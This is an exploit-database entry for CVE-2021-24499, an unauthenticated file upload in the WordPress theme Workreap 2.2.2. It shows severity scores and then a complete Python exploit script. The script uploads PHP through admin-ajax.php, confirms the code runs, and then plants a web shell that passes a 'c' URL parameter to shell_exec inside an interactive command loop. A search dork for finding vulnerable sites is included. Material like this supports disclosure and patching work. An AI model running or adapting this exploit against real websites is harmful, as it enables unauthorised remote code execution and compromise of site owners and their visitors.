WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution

2023-06-0900:00:00

Mohammad Hossein Khanaki

www.exploit-db.com

212

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.141 Low

EPSS

Percentile

95.6%

JSON

# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
# Dork: inurl:/wp-content/themes/workreap/
# Date: 2023-06-01
# Category : Webapps
# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454
# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)
# Version: 2.2.2
# Tested on: Windows/Linux
# CVE: CVE-2021-24499


import requests
import random
import string
import sys


def usage():
    banner = '''
    NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
    usage: python3 Workreap_rce.py <URL> 
    example for linux : python3 Workreap_rce.py https://www.exploit-db.com
    example for Windows : python Workreap_rce.py https://www.exploit-db.com
    '''
    print(f"{BOLD}{banner}{ENDC}")

def upload_file(target):
    print("[ ] Uploading File")
    url = target + "/wp-admin/admin-ajax.php"
    body = "<?php echo '" + random_str + "';?>"
    data = {"action": "workreap_award_temp_file_uploader"}
    response = requests.post(url, data=data, files={"award_img": (file_name, body)})
    if '{"type":"success",' in response.text:
        print(f"{GREEN}[+] File uploaded successfully{ENDC}")
        check_php_file(target)
    else:
        print(f"{RED}[+] File was not uploaded{ENDC}")

def check_php_file(target):
    response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name)
    if random_str in response_2.text:
        print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")
        print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name)
        question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")
        if question == "y" or question == "Y":
            print("[ ] Uploading Shell ")
            get_rce(target)
        else:
            usage()
    else:
        print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}")

def get_rce(target):
    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
    body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'
    data = {"action": "workreap_award_temp_file_uploader"}
    response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)})
    print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")
    while True:
        command = input(f"{YELLOW}Enter a command to execute: {ENDC}")
        print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}")
        response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}")
        print(f"{GREEN}{response_4.text}{ENDC}")


if __name__ == "__main__":
    global GREEN , RED, YELLOW, BOLD, ENDC
    GREEN = '\033[92m'
    RED = '\033[91m'
    YELLOW = '\033[93m'
    BOLD = '\033[1m'
    ENDC = '\033[0m'
    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
    random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
    try:
        upload_file(sys.argv[1])
    except IndexError:
            usage()
    except requests.exceptions.RequestException as e:
        print("\nPlease Enter Valid Address")